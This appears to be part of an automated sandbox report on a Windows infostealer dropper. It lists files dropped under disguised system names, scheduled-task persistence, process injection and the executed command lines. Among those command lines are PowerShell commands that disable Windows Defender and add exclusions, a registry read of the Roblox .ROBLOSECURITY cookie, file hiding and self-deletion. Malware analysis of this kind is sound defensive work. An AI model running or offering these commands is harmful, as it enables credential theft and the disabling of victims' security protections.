File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\6cb0b6c459d5d3 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Internet Explorer\en-US\spoolsv.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\56085415360792 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Common Files\dwm.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Speech_OneCore\Engines\e6c9b481da804f C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\Migration\WTR\SppExtComObj.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\Migration\WTR\e1ef82546f0b02 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\INF\winlogon.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\INF\cc11b995f2a76d C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\чекер dc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000_Classes\Local Settings C:\Users\All Users\OfficeClickToRun.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3572 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 3572 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 3572 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3572 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3572 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3572 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 3572 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2088 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2876 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2876 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2876 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2088 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\attrib.exe
PID 2088 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\attrib.exe
PID 2088 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\system32\schtasks.exe
PID 2088 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\system32\schtasks.exe
PID 2088 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\system32\schtasks.exe
PID 2088 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\system32\schtasks.exe
PID 2088 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 4128 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4128 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4128 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1072 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 1072 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2088 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\cmd.exe
PID 2088 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\cmd.exe
PID 3680 wrote to memory of 3916 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 3680 wrote to memory of 3916 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 3532 wrote to memory of 5028 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 3532 wrote to memory of 5028 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 1072 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5028 wrote to memory of 3444 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5028 wrote to memory of 3444 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5028 wrote to memory of 4940 N/A C:\Windows\System32\cmd.exe C:\Users\All Users\OfficeClickToRun.exe
PID 5028 wrote to memory of 4940 N/A C:\Windows\System32\cmd.exe C:\Users\All Users\OfficeClickToRun.exe
PID 4940 wrote to memory of 1496 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 4940 wrote to memory of 1496 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 4940 wrote to memory of 4132 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 4940 wrote to memory of 4132 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1496 wrote to memory of 1684 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\OfficeClickToRun.exe
PID 1496 wrote to memory of 1684 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\OfficeClickToRun.exe
PID 1684 wrote to memory of 3968 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1684 wrote to memory of 3968 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1684 wrote to memory of 2380 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1684 wrote to memory of 2380 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 3968 wrote to memory of 1156 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\OfficeClickToRun.exe
PID 3968 wrote to memory of 1156 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\OfficeClickToRun.exe
PID 1156 wrote to memory of 4372 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1156 wrote to memory of 4372 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"

C:\Users\Admin\AppData\Local\Temp\stealer.exe

"C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"

C:\Users\Admin\AppData\Local\Temp\Inject.exe

"C:\Users\Admin\AppData\Local\Temp\Inject.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "

C:\MsWinsessiondllNet\driverBrokercommon.exe

"C:\MsWinsessiondllNet\driverBrokercommon.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /f

